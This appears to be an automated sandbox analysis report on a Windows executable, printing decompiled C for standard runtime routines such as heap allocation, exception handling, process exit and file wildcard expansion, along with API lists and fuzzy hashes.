                                              				void* __esi;
                                              				void* _t8;
                                              				void* _t12;
                                              				signed int _t13;
                                              				void* _t15;
                                              				signed int _t16;
                                              				signed int _t18;
                                              				long _t19;
                                              
                                              				_t15 = __ecx;
                                              				_t18 = _a4;
                                              				if(_t18 == 0) {
                                              					L2:
                                              					_t19 = _t18 * _a8;
                                              					if(_t19 == 0) {
                                              						_t19 = _t19 + 1;
                                              					}
                                              					while(1) {
                                              						_t8 = RtlAllocateHeap( *0x305908, 8, _t19); // executed
                                              						if(_t8 != 0) {
                                              							break;
                                              						}
                                              						__eflags = E002F3087();
                                              						if(__eflags == 0) {
                                              							L8:
                                              							 *((intOrPtr*)(E002F4124())) = 0xc;
                                              							__eflags = 0;
                                              							return 0;
                                              						}
                                              						_t12 = E002F61F0(_t15, _t16, _t19, __eflags, _t19);
                                              						_pop(_t15);
                                              						__eflags = _t12;
                                              						if(_t12 == 0) {
                                              							goto L8;
                                              						}
                                              					}
                                              					return _t8;
                                              				}
                                              				_t13 = 0xffffffe0;
                                              				_t16 = _t13 % _t18;
                                              				if(_t13 / _t18 < _a8) {
                                              					goto L8;
                                              				}
                                              				goto L2;
                                              			}











                                              0x002f3727
                                              0x002f372d
                                              0x002f3732
                                              0x002f3740
                                              0x002f3740
                                              0x002f3746
                                              0x002f3748
                                              0x002f3748
                                              0x002f375f
                                              0x002f3768
                                              0x002f3770
                                              0x00000000
                                              0x00000000
                                              0x002f3750
                                              0x002f3752
                                              0x002f3774
                                              0x002f3779
                                              0x002f377f
                                              0x00000000
                                              0x002f377f
                                              0x002f3755
                                              0x002f375a
                                              0x002f375b
                                              0x002f375d
                                              0x00000000
                                              0x00000000
                                              0x002f375d
                                              0x00000000
                                              0x002f375f
                                              0x002f3738
                                              0x002f3739
                                              0x002f373e
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F3C97,00000001,00000364,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F3768
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 5c05336bf4cfdb06342eb76cded910e2ceb246b42bd079d5b804b297705a1e20
                                              • Instruction ID: f8184019f39641e999210ec5418c86fc6af08867dfd5fdb08090d011095c9de1
                                              • Opcode Fuzzy Hash: 5c05336bf4cfdb06342eb76cded910e2ceb246b42bd079d5b804b297705a1e20
                                              • Instruction Fuzzy Hash: 5EF090B262112DA6DA25FE229C05A7BF7489B417F0B144131AE08D6191CA60EA20CAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002F3696(void* __ecx, long _a4) {
                                              				void* __esi;
                                              				void* _t4;
                                              				void* _t6;
                                              				void* _t7;
                                              				void* _t8;
                                              				long _t9;
                                              
                                              				_t7 = __ecx;
                                              				_t9 = _a4;
                                              				if(_t9 > 0xffffffe0) {
                                              					L7:
                                              					 *((intOrPtr*)(E002F4124())) = 0xc;
                                              					__eflags = 0;
                                              					return 0;
                                              				}
                                              				if(_t9 == 0) {
                                              					_t9 = _t9 + 1;
                                              				}
                                              				while(1) {
                                              					_t4 = RtlAllocateHeap( *0x305908, 0, _t9); // executed
                                              					if(_t4 != 0) {
                                              						break;
                                              					}
                                              					__eflags = E002F3087();
                                              					if(__eflags == 0) {
                                              						goto L7;
                                              					}
                                              					_t6 = E002F61F0(_t7, _t8, _t9, __eflags, _t9);
                                              					_pop(_t7);
                                              					__eflags = _t6;
                                              					if(_t6 == 0) {
                                              						goto L7;
                                              					}
                                              				}
                                              				return _t4;
                                              			}









                                              0x002f3696
                                              0x002f369c
                                              0x002f36a2
                                              0x002f36d4
                                              0x002f36d9
                                              0x002f36df
                                              0x00000000
                                              0x002f36df
                                              0x002f36a6
                                              0x002f36a8
                                              0x002f36a8
                                              0x002f36bf
                                              0x002f36c8
                                              0x002f36d0
                                              0x00000000
                                              0x00000000
                                              0x002f36b0
                                              0x002f36b2
                                              0x00000000
                                              0x00000000
                                              0x002f36b5
                                              0x002f36ba
                                              0x002f36bb
                                              0x002f36bd
                                              0x00000000
                                              0x00000000
                                              0x002f36bd
                                              0x00000000

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 58fbc85a0cc43137314c853ce82dbaedc0d81c69f064ab047d51b3f7ca433ba6
                                              • Instruction ID: e8a5b18c55296bcd4407610f6bd94e6072965285759625050f343f9f548dec1f
                                              • Opcode Fuzzy Hash: 58fbc85a0cc43137314c853ce82dbaedc0d81c69f064ab047d51b3f7ca433ba6
                                              • Instruction Fuzzy Hash: 29E0A02122112E77EA22AA269C04B7BF64C9B023E0F150031AE05D6291CF60CE608AAC
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 76%
                                              			E002F3D62(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				char _v0;
                                              				signed int _v8;
                                              				intOrPtr _v524;
                                              				intOrPtr _v528;
                                              				void* _v532;
                                              				intOrPtr _v536;
                                              				char _v540;
                                              				intOrPtr _v544;
                                              				intOrPtr _v548;
                                              				intOrPtr _v552;
                                              				intOrPtr _v556;
                                              				intOrPtr _v560;
                                              				intOrPtr _v564;
                                              				intOrPtr _v568;
                                              				intOrPtr _v572;
                                              				intOrPtr _v576;
                                              				intOrPtr _v580;
                                              				intOrPtr _v584;
                                              				char _v724;
                                              				intOrPtr _v792;
                                              				intOrPtr _v800;
                                              				char _v804;
                                              				struct _EXCEPTION_POINTERS _v812;
                                              				signed int _t40;
                                              				char* _t47;
                                              				char* _t49;
                                              				intOrPtr _t61;
                                              				intOrPtr _t62;
                                              				intOrPtr _t66;
                                              				intOrPtr _t67;
                                              				int _t68;
                                              				intOrPtr _t69;
                                              				signed int _t70;
                                              
                                              				_t69 = __esi;
                                              				_t67 = __edi;
                                              				_t66 = __edx;
                                              				_t61 = __ebx;
                                              				_t40 =  *0x304018; // 0x9021af28
                                              				_t41 = _t40 ^ _t70;
                                              				_v8 = _t40 ^ _t70;
                                              				if(_a4 != 0xffffffff) {
                                              					_push(_a4);
                                              					E002F1768(_t41);
                                              					_pop(_t62);
                                              				}
                                              				E002F1D00(_t67,  &_v804, 0, 0x50);
                                              				E002F1D00(_t67,  &_v724, 0, 0x2cc);
                                              				_v812.ExceptionRecord =  &_v804;
                                              				_t47 =  &_v724;
                                              				_v812.ContextRecord = _t47;
                                              				_v548 = _t47;
                                              				_v552 = _t62;
                                              				_v556 = _t66;
                                              				_v560 = _t61;
                                              				_v564 = _t69;
                                              				_v568 = _t67;
                                              				_v524 = ss;
                                              				_v536 = cs;
                                              				_v572 = ds;
                                              				_v576 = es;
                                              				_v580 = fs;
                                              				_v584 = gs;
                                              				asm("pushfd");
                                              				_pop( *_t22);
                                              				_v540 = _v0;
                                              				_t49 =  &_v0;
                                              				_v528 = _t49;
                                              				_v724 = 0x10001;
                                              				_v544 =  *((intOrPtr*)(_t49 - 4));
                                              				_v804 = _a8;
                                              				_v800 = _a12;
                                              				_v792 = _v0;
                                              				_t68 = IsDebuggerPresent();
                                              				SetUnhandledExceptionFilter(0);
                                              				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                              					_push(_a4);
                                              					E002F1768(_t57);
                                              				}
                                              				return E002F19D1(_v8 ^ _t70);
                                              			}




































                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d6d
                                              0x002f3d72
                                              0x002f3d74
                                              0x002f3d7c
                                              0x002f3d7e
                                              0x002f3d81
                                              0x002f3d86
                                              0x002f3d86
                                              0x002f3d92
                                              0x002f3da5
                                              0x002f3db3
                                              0x002f3db9
                                              0x002f3dbf
                                              0x002f3dc5
                                              0x002f3dcb
                                              0x002f3dd1
                                              0x002f3dd7
                                              0x002f3ddd
                                              0x002f3de3
                                              0x002f3de9
                                              0x002f3df0
                                              0x002f3df7
                                              0x002f3dfe
                                              0x002f3e05
                                              0x002f3e0c
                                              0x002f3e13
                                              0x002f3e14
                                              0x002f3e1d
                                              0x002f3e23
                                              0x002f3e26
                                              0x002f3e2c
                                              0x002f3e39
                                              0x002f3e42
                                              0x002f3e4b
                                              0x002f3e54
                                              0x002f3e62
                                              0x002f3e64
                                              0x002f3e79
                                              0x002f3e85
                                              0x002f3e88
                                              0x002f3e8d
                                              0x002f3e9c

                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002F3E5A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002F3E64
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 002F3E71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 22fd4b3a75afaaaeafa6a1c0b89a9adf53db8bcf8fa96e74de3767b39c658fc2
                                              • Instruction ID: 0f19e63b96914d05b762b3c4f8ef7e19820dccba9e2bfd111bae77855ba9c911
                                              • Opcode Fuzzy Hash: 22fd4b3a75afaaaeafa6a1c0b89a9adf53db8bcf8fa96e74de3767b39c658fc2
                                              • Instruction Fuzzy Hash: AA31F47491121CABCB21DF24DC88B9CBBB8AF08750F5041EAE90CA7260EB709F91CF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F2E0B(int _a4) {
                                              				void* _t14;
                                              				void* _t16;
                                              
                                              				if(E002F5386(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                              					TerminateProcess(GetCurrentProcess(), _a4);
                                              				}
                                              				E002F2E90(_t14, _t16, _a4);
                                              				ExitProcess(_a4);
                                              			}





                                              0x002f2e17
                                              0x002f2e33
                                              0x002f2e33
                                              0x002f2e3c
                                              0x002f2e45

                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000,?,002F3726,00000003), ref: 002F2E2C
                                              • TerminateProcess.KERNEL32(00000000,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000,?,002F3726,00000003), ref: 002F2E33
                                              • ExitProcess.KERNEL32 ref: 002F2E45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: d694636245e0cb446070de98e81bb5eb39d943296c092721ab2221ee704652f2
                                              • Instruction ID: f5d55871ed91bdbac2dff70aa0d36769841463f0d34184559039e61e472cedde
                                              • Opcode Fuzzy Hash: d694636245e0cb446070de98e81bb5eb39d943296c092721ab2221ee704652f2
                                              • Instruction Fuzzy Hash: DAE04631010208EFCF026F54ED0CA697F2AEF113D2B114438FA04AA131CB75EC66CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E002F431C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v28;
                                              				signed int _v32;
                                              				WCHAR* _v36;
                                              				signed int _v48;
                                              				intOrPtr _v556;
                                              				intOrPtr _v558;
                                              				struct _WIN32_FIND_DATAW _v604;
                                              				intOrPtr* _v608;
                                              				signed int _v612;
                                              				signed int _v616;
                                              				intOrPtr _v644;
                                              				intOrPtr _v648;
                                              				signed int _t40;
                                              				signed int _t45;
                                              				signed int _t48;
                                              				signed int _t50;
                                              				signed int _t51;
                                              				signed char _t53;
                                              				signed int _t62;
                                              				void* _t64;
                                              				union _FINDEX_INFO_LEVELS _t66;
                                              				signed int _t71;
                                              				intOrPtr* _t72;
                                              				signed int _t75;
                                              				void* _t82;
                                              				void* _t84;
                                              				signed int _t85;
                                              				void* _t89;
                                              				WCHAR* _t90;
                                              				intOrPtr* _t94;
                                              				intOrPtr _t97;
                                              				void* _t99;
                                              				signed int _t100;
                                              				intOrPtr* _t104;
                                              				signed int _t107;
                                              				void* _t110;
                                              				intOrPtr _t111;
                                              				void* _t112;
                                              				void* _t114;
                                              				void* _t115;
                                              				signed int _t117;
                                              				void* _t118;
                                              				union _FINDEX_INFO_LEVELS _t119;
                                              				void* _t124;
                                              				void* _t125;
                                              				signed int _t126;
                                              				void* _t127;
                                              				signed int _t132;
                                              				void* _t133;
                                              				signed int _t134;
                                              				void* _t135;
                                              				void* _t136;
                                              
                                              				_push(__ecx);
                                              				_t94 = _a4;
                                              				_push(__ebx);
                                              				_push(__edi);
                                              				_t2 = _t94 + 2; // 0x2
                                              				_t110 = _t2;
                                              				do {
                                              					_t40 =  *_t94;
                                              					_t94 = _t94 + 2;
                                              				} while (_t40 != 0);
                                              				_t117 = _a12;
                                              				_t97 = (_t94 - _t110 >> 1) + 1;
                                              				_v8 = _t97;
                                              				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
                                              					_push(__esi);
                                              					_t5 = _t117 + 1; // 0x1
                                              					_t89 = _t5 + _t97;
                                              					_t124 = E002F3727(_t97, _t89, 2);
                                              					_pop(_t99);
                                              					__eflags = _t117;
                                              					if(_t117 == 0) {
                                              						L6:
                                              						_push(_v8);
                                              						_t89 = _t89 - _t117;
                                              						_t45 = E002F40A0(_t99, _t124 + _t117 * 2, _t89, _a4);
                                              						_t134 = _t133 + 0x10;
                                              						__eflags = _t45;
                                              						if(__eflags != 0) {
                                              							goto L9;
                                              						} else {
                                              							_t82 = E002F4595(_a16, _t110, __eflags, _t124);
                                              							E002F365C(0);
                                              							_t84 = _t82;
                                              							goto L8;
                                              						}
                                              					} else {
                                              						_push(_t117);
                                              						_t85 = E002F40A0(_t99, _t124, _t89, _a8);
                                              						_t134 = _t133 + 0x10;
                                              						__eflags = _t85;
                                              						if(_t85 != 0) {
                                              							L9:
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							E002F3F3C();
                                              							asm("int3");
                                              							_t132 = _t134;
                                              							_t135 = _t134 - 0x260;
                                              							_t48 =  *0x304018; // 0x9021af28
                                              							_v48 = _t48 ^ _t132;
                                              							_t111 = _v28;
                                              							_t100 = _v32;
                                              							_push(_t89);
                                              							_t90 = _v36;
                                              							_push(_t124);
                                              							_push(_t117);
                                              							_t125 = 0x5c;
                                              							_v644 = _t111;
                                              							_v648 = 0x2f;
                                              							_t118 = 0x3a;
                                              							while(1) {
                                              								__eflags = _t100 - _t90;
                                              								if(_t100 == _t90) {
                                              									break;
                                              								}
                                              								_t50 =  *_t100 & 0x0000ffff;
                                              								__eflags = _t50 - _v612;
                                              								if(_t50 != _v612) {
                                              									__eflags = _t50 - _t125;
                                              									if(_t50 != _t125) {
                                              										__eflags = _t50 - _t118;
                                              										if(_t50 != _t118) {
                                              											_t100 = _t100 - 2;
                                              											__eflags = _t100;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              								break;
                                              							}
                                              							_t126 =  *_t100 & 0x0000ffff;
                                              							__eflags = _t126 - _t118;
                                              							if(_t126 != _t118) {
                                              								L19:
                                              								_t51 = _t126;
                                              								_t119 = 0;
                                              								_t112 = 0x2f;
                                              								__eflags = _t51 - _t112;
                                              								if(_t51 == _t112) {
                                              									L23:
                                              									_t53 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									_t114 = 0x5c;
                                              									__eflags = _t51 - _t114;
                                              									if(_t51 == _t114) {
                                              										goto L23;
                                              									} else {
                                              										_t115 = 0x3a;
                                              										__eflags = _t51 - _t115;
                                              										if(_t51 == _t115) {
                                              											goto L23;
                                              										} else {
                                              											_t53 = 0;
                                              										}
                                              									}
                                              								}
                                              								_t103 = (_t100 - _t90 >> 1) + 1;
                                              								asm("sbb eax, eax");
                                              								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                              								E002F1D00(_t119,  &_v604, _t119, 0x250);
                                              								_t136 = _t135 + 0xc;
                                              								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
                                              								__eflags = _t127 - 0xffffffff;
                                              								if(_t127 != 0xffffffff) {
                                              									_t104 = _v608;
                                              									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                              									__eflags = _t62;
                                              									_v616 = _t62 >> 2;
                                              									_t64 = 0x2e;
                                              									do {
                                              										__eflags = _v604.cFileName - _t64;
                                              										if(_v604.cFileName != _t64) {
                                              											L36:
                                              											_push(_t104);
                                              											_t66 = E002F431C(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
                                              											_t136 = _t136 + 0x10;
                                              											__eflags = _t66;
                                              											if(_t66 != 0) {
                                              												goto L26;
                                              											} else {
                                              												goto L37;
                                              											}
                                              										} else {
                                              											__eflags = _v558 - _t119;
                                              											if(_v558 == _t119) {
                                              												goto L37;
                                              											} else {
                                              												__eflags = _v558 - _t64;
                                              												if(_v558 != _t64) {
                                              													goto L36;
                                              												} else {
                                              													__eflags = _v556 - _t119;
                                              													if(_v556 == _t119) {
                                              														goto L37;
                                              													} else {
                                              														goto L36;
                                              													}
                                              												}
                                              											}
                                              										}
                                              										goto L40;
                                              										L37:
                                              										_t71 = FindNextFileW(_t127,  &_v604);
                                              										_t104 = _v608;
                                              										__eflags = _t71;
                                              										_t64 = 0x2e;
                                              									} while (_t71 != 0);
                                              									_t72 = _t104;
                                              									_t107 = _v616;
                                              									_t113 =  *_t72;
                                              									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                              									__eflags = _t107 - _t75;
                                              									if(_t107 != _t75) {
                                              										E002F6DD0(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E002F4137);
                                              									}
                                              								} else {
                                              									_push(_v608);
                                              									_t66 = E002F431C(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
                                              									L26:
                                              									_t119 = _t66;
                                              								}
                                              								__eflags = _t127 - 0xffffffff;
                                              								if(_t127 != 0xffffffff) {
                                              									FindClose(_t127);
                                              								}
                                              							} else {
                                              								__eflags = _t100 -  &(_t90[1]);
                                              								if(_t100 ==  &(_t90[1])) {
                                              									goto L19;
                                              								} else {
                                              									_push(_t111);
                                              									E002F431C(_t90, _t100, 0, _t126, _t90, 0, 0);
                                              								}
                                              							}
                                              							__eflags = _v12 ^ _t132;
                                              							return E002F19D1(_v12 ^ _t132);
                                              						} else {
                                              							goto L6;
                                              						}
                                              					}
                                              				} else {
                                              					_t84 = 0xc;
                                              					L8:
                                              					return _t84;
                                              				}
                                              				L40:
                                              			}

























































                                              0x002f4321
                                              0x002f4322
                                              0x002f4325
                                              0x002f4326
                                              0x002f4329
                                              0x002f4329
                                              0x002f432c
                                              0x002f432c
                                              0x002f432f
                                              0x002f4332
                                              0x002f4337
                                              0x002f4341
                                              0x002f4344
                                              0x002f4349
                                              0x002f4350
                                              0x002f4351
                                              0x002f4354
                                              0x002f435e
                                              0x002f4361
                                              0x002f4362
                                              0x002f4364
                                              0x002f4378
                                              0x002f4378
                                              0x002f437b
                                              0x002f4385
                                              0x002f438a
                                              0x002f438d
                                              0x002f438f
                                              0x00000000
                                              0x002f4391
                                              0x002f4395
                                              0x002f439e
                                              0x002f43a4
                                              0x00000000
                                              0x002f43a6
                                              0x002f4366
                                              0x002f4366
                                              0x002f436c
                                              0x002f4371
                                              0x002f4374
                                              0x002f4376
                                              0x002f43ad
                                              0x002f43af
                                              0x002f43b0
                                              0x002f43b1
                                              0x002f43b2
                                              0x002f43b3
                                              0x002f43b4
                                              0x002f43b9
                                              0x002f43bd
                                              0x002f43bf
                                              0x002f43c5
                                              0x002f43cc
                                              0x002f43cf
                                              0x002f43d2
                                              0x002f43d5
                                              0x002f43d6
                                              0x002f43d9
                                              0x002f43da
                                              0x002f43dd
                                              0x002f43e0
                                              0x002f43e6
                                              0x002f43f0
                                              0x002f440c
                                              0x002f440c
                                              0x002f440e
                                              0x00000000
                                              0x00000000
                                              0x002f43f3
                                              0x002f43f6
                                              0x002f43fd
                                              0x002f43ff
                                              0x002f4402
                                              0x002f4404
                                              0x002f4407
                                              0x002f4409
                                              0x002f4409
                                              0x00000000
                                              0x002f4409
                                              0x002f4407
                                              0x002f4402
                                              0x00000000
                                              0x002f43fd
                                              0x002f4410
                                              0x002f4413
                                              0x002f4416
                                              0x002f4432
                                              0x002f4434
                                              0x002f4436
                                              0x002f4438
                                              0x002f4439
                                              0x002f443c
                                              0x002f4452
                                              0x002f4454
                                              0x002f4454
                                              0x002f443e
                                              0x002f4440
                                              0x002f4441
                                              0x002f4444
                                              0x00000000
                                              0x002f4446
                                              0x002f4448
                                              0x002f4449
                                              0x002f444c
                                              0x00000000
                                              0x002f444e
                                              0x002f444e
                                              0x002f444e
                                              0x002f444c
                                              0x002f4444
                                              0x002f445c
                                              0x002f4464
                                              0x002f4468
                                              0x002f4476
                                              0x002f447b
                                              0x002f4490
                                              0x002f4492
                                              0x002f4495
                                              0x002f44ca
                                              0x002f44d5
                                              0x002f44d5
                                              0x002f44da
                                              0x002f44e0
                                              0x002f44e1
                                              0x002f44e1
                                              0x002f44e8
                                              0x002f4505
                                              0x002f4505
                                              0x002f4514
                                              0x002f4519
                                              0x002f451c
                                              0x002f451e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f44ea
                                              0x002f44ea
                                              0x002f44f1
                                              0x00000000
                                              0x002f44f3
                                              0x002f44f3
                                              0x002f44fa
                                              0x00000000
                                              0x002f44fc
                                              0x002f44fc
                                              0x002f4503
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f4503
                                              0x002f44fa
                                              0x002f44f1
                                              0x00000000
                                              0x002f4520
                                              0x002f4528
                                              0x002f452e
                                              0x002f4534
                                              0x002f4538
                                              0x002f4538
                                              0x002f453b
                                              0x002f453d
                                              0x002f4543
                                              0x002f454a
                                              0x002f454d
                                              0x002f454f
                                              0x002f4563
                                              0x002f4568
                                              0x002f4497
                                              0x002f449d
                                              0x002f44a1
                                              0x002f44a9
                                              0x002f44a9
                                              0x002f44a9
                                              0x002f44ab
                                              0x002f44ae
                                              0x002f44b1
                                              0x002f44b1
                                              0x002f4418
                                              0x002f441b
                                              0x002f441d
                                              0x00000000
                                              0x002f441f
                                              0x002f441f
                                              0x002f4425
                                              0x002f442a
                                              0x002f441d
                                              0x002f44be
                                              0x002f44c9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f4376
                                              0x002f434b
                                              0x002f434d
                                              0x002f43a7
                                              0x002f43ac
                                              0x002f43ac
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID: /
                                              • API String ID: 0-2043925204
                                              • Opcode ID: f1c7ba68bd913ab63c98759891bd8082eb24005fdda64e5b4767862e757065d9
                                              • Instruction ID: e5a9b66d97722e02c8dff227e74bc5f09d8443e8ac97213049dcecdc053635e2
                                              • Opcode Fuzzy Hash: f1c7ba68bd913ab63c98759891bd8082eb24005fdda64e5b4767862e757065d9
                                              • Instruction Fuzzy Hash: BD413A7691021D6BCB24EFB8DC48EBBB778EB84794F6042B9FA05D7180E6709E51CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F9B35(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                              				signed int _t172;
                                              				signed int _t175;
                                              				signed int _t178;
                                              				signed int* _t179;
                                              				signed int _t195;
                                              				signed int _t199;
                                              				signed int _t202;
                                              				void* _t203;
                                              				void* _t206;
                                              				signed int _t209;
                                              				void* _t210;
                                              				signed int _t225;
                                              				unsigned int* _t240;
                                              				signed char _t242;
                                              				signed int* _t250;
                                              				unsigned int* _t256;
                                              				signed int* _t257;
                                              				signed char _t259;
                                              				long _t262;
                                              				signed int* _t265;
                                              
                                              				 *(_a4 + 4) = 0;
                                              				_t262 = 0xc000000d;
                                              				 *(_a4 + 8) = 0;
                                              				 *(_a4 + 0xc) = 0;
                                              				_t242 = _a12;
                                              				if((_t242 & 0x00000010) != 0) {
                                              					_t262 = 0xc000008f;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                              				}
                                              				if((_t242 & 0x00000002) != 0) {
                                              					_t262 = 0xc0000093;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                              				}
                                              				if((_t242 & 0x00000001) != 0) {
                                              					_t262 = 0xc0000091;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                              				}
                                              				if((_t242 & 0x00000004) != 0) {
                                              					_t262 = 0xc000008e;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                              				}
                                              				if((_t242 & 0x00000008) != 0) {
                                              					_t262 = 0xc0000090;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                              				}
                                              				_t265 = _a8;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                              				_t259 = E002F7836(_a4);
                                              				if((_t259 & 0x00000001) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                              				}
                                              				if((_t259 & 0x00000004) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                              				}
